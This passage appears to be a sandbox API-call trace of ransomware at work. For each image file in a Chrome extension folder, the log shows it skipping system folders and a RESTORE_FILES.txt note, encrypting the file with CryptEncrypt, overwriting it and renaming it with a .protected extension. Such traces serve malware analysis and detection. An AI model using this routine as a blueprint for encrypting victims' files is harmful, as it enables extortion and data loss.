dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.871] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png") returned 152 [0080.871] StrStrW (lpFirst="icon_16.png", lpSrch=".txt") returned 0x0 [0080.871] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png") returned 152 [0080.871] StrStrW (lpFirst="icon_16.png", lpSrch=".rar") returned 0x0 [0080.871] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png") returned 152 [0080.871] StrStrW (lpFirst="icon_16.png", lpSrch=".zip") returned 0x0 [0080.872] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x22c, lpOverlapped=0x0) returned 1 [0080.872] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xfffffdd4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.872] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x22c, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x22c, lpOverlapped=0x0) returned 1 [0080.873] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.873] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.873] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.873] CloseHandle (hObject=0x164) returned 1 [0080.873] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.protected") returned 162 [0080.873] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.protected")) returned 1 [0080.881] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.882] lstrcmpiW (lpString1="topbar_floating_button.png", lpString2="Windows") returned -1 [0080.882] lstrcmpiW (lpString1="topbar_floating_button.png", lpString2="Program Files") returned 1 [0080.882] lstrcmpiW (lpString1="topbar_floating_button.png", lpString2="Program Files (x86)") returned 1 [0080.882] lstrcmpiW (lpString1="topbar_floating_button.png", lpString2="$Recycle.bin") returned 1 [0080.882] lstrcmpiW (lpString1="topbar_floating_button.png", lpString2="System Volume Information") returned 1 [0080.882] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png") returned 167 [0080.882] StrStrIW (lpFirst="topbar_floating_button.png", lpSrch=".protected") returned 0x0 [0080.882] lstrcmpW (lpString1="topbar_floating_button.png", lpString2="RESTORE_FILES.txt") returned 1 [0080.882] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.882] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.882] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.882] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png") returned 167 [0080.882] StrStrW (lpFirst="topbar_floating_button.png", lpSrch=".txt") returned 0x0 [0080.882] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png") returned 167 [0080.883] StrStrW (lpFirst="topbar_floating_button.png", lpSrch=".rar") returned 0x0 [0080.883] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png") returned 167 [0080.883] StrStrW (lpFirst="topbar_floating_button.png", lpSrch=".zip") returned 0x0 [0080.883] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0xa0, lpOverlapped=0x0) returned 1 [0080.884] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffff60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.884] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0xa0, lpOverlapped=0x0) returned 1 [0080.884] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.884] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.884] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.884] CloseHandle (hObject=0x164) returned 1 [0080.884] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.protected") returned 177 [0080.884] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.protected")) returned 1 [0080.885] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.885] lstrcmpiW (lpString1="topbar_floating_button_close.png", lpString2="Windows") returned -1 [0080.885] lstrcmpiW (lpString1="topbar_floating_button_close.png", lpString2="Program Files") returned 1 [0080.885] lstrcmpiW (lpString1="topbar_floating_button_close.png", lpString2="Program Files (x86)") returned 1 [0080.885] lstrcmpiW (lpString1="topbar_floating_button_close.png", lpString2="$Recycle.bin") returned 1 [0080.885] lstrcmpiW (lpString1="topbar_floating_button_close.png", lpString2="System Volume Information") returned 1 [0080.885] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png") returned 173 [0080.885] StrStrIW (lpFirst="topbar_floating_button_close.png", lpSrch=".protected") returned 0x0 [0080.885] lstrcmpW (lpString1="topbar_floating_button_close.png", lpString2="RESTORE_FILES.txt") returned 1 [0080.885] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.886] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.886] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.886] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png") returned 173 [0080.886] StrStrW (lpFirst="topbar_floating_button_close.png", lpSrch=".txt") returned 0x0 [0080.886] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png") returned 173 [0080.886] StrStrW (lpFirst="topbar_floating_button_close.png", lpSrch=".rar") returned 0x0 [0080.886] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png") returned 173 [0080.886] StrStrW (lpFirst="topbar_floating_button_close.png", lpSrch=".zip") returned 0x0 [0080.886] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0xfc, lpOverlapped=0x0) returned 1 [0080.887] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffff04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.887] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0xfc, lpOverlapped=0x0) returned 1 [0080.887] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.887] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.888] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.888] CloseHandle (hObject=0x164) returned 1 [0080.888] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.protected") returned 183 [0080.888] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png.protected")) returned 1 [0080.889] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.889] lstrcmpiW (lpString1="topbar_floating_button_hover.png", lpString2="Windows") returned -1 [0080.889] lstrcmpiW (lpString1="topbar_floating_button_hover.png", lpString2="Program Files") returned 1 [0080.889] lstrcmpiW (lpString1="topbar_floating_button_hover.png", lpString2="Program Files (x86)") returned 1 [0080.889] lstrcmpiW (lpString1="topbar_floating_button_hover.png", lpString2="$Recycle.bin") returned 1 [0080.889] lstrcmpiW (lpString1="topbar_floating_button_hover.png", lpString2="System Volume Information") returned 1 [0080.889] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png") returned 173 [0080.889] StrStrIW (lpFirst="topbar_floating_button_hover.png", lpSrch=".protected") returned 0x0 [0080.889] lstrcmpW (lpString1="topbar_floating_button_hover.png", lpString2="RESTORE_FILES.txt") returned 1 [0080.889] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.889] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.889] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png") returned 173 [0080.889] StrStrW (lpFirst="topbar_floating_button_hover.png", lpSrch=".txt") returned 0x0 [0080.889] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png") returned 173 [0080.889] StrStrW (lpFirst="topbar_floating_button_hover.png", lpSrch=".rar") returned 0x0 [0080.890] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png") returned 173 [0080.890] StrStrW (lpFirst="topbar_floating_button_hover.png", lpSrch=".zip") returned 0x0 [0080.890] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0xa0, lpOverlapped=0x0) returned 1 [0080.890] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffff60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.891] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0xa0, lpOverlapped=0x0) returned 1 [0080.891] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.891] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.891] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.891] CloseHandle (hObject=0x164) returned 1 [0080.891] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.protected") returned 183 [0080.891] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.protected")) returned 1 [0080.892] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.892] lstrcmpiW (lpString1="topbar_floating_button_maximize.png", lpString2="Windows") returned -1 [0080.892] lstrcmpiW (lpString1="topbar_floating_button_maximize.png", lpString2="Program Files") returned 1 [0080.892] lstrcmpiW (lpString1="topbar_floating_button_maximize.png", lpString2="Program Files (x86)") returned 1 [0080.892] lstrcmpiW (lpString1="topbar_floating_button_maximize.png", lpString2="$Recycle.bin") returned 1 [0080.892] lstrcmpiW (lpString1="topbar_floating_button_maximize.png", lpString2="System Volume Information") returned 1 [0080.892] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png") returned 176 [0080.892] StrStrIW (lpFirst="topbar_floating_button_maximize.png", lpSrch=".protected") returned 0x0 [0080.892] lstrcmpW (lpString1="topbar_floating_button_maximize.png", lpString2="RESTORE_FILES.txt") returned 1 [0080.892] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.892] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.894] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png") returned 176 [0080.894] StrStrW (lpFirst="topbar_floating_button_maximize.png", lpSrch=".txt") returned 0x0 [0080.894] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png") returned 176 [0080.894] StrStrW (lpFirst="topbar_floating_button_maximize.png", lpSrch=".rar") returned 0x0 [0080.894] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png") returned 176 [0080.894] StrStrW (lpFirst="topbar_floating_button_maximize.png", lpSrch=".zip") returned 0x0 [0080.894] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0xa6, lpOverlapped=0x0) returned 1 [0080.895] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffff5a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.895] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0xa6, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0xa6, lpOverlapped=0x0) returned 1 [0080.895] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.895] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.895] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.895] CloseHandle (hObject=0x164) returned 1 [0080.895] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.protected") returned 186 [0080.896] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png.protected")) returned 1 [0080.896] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 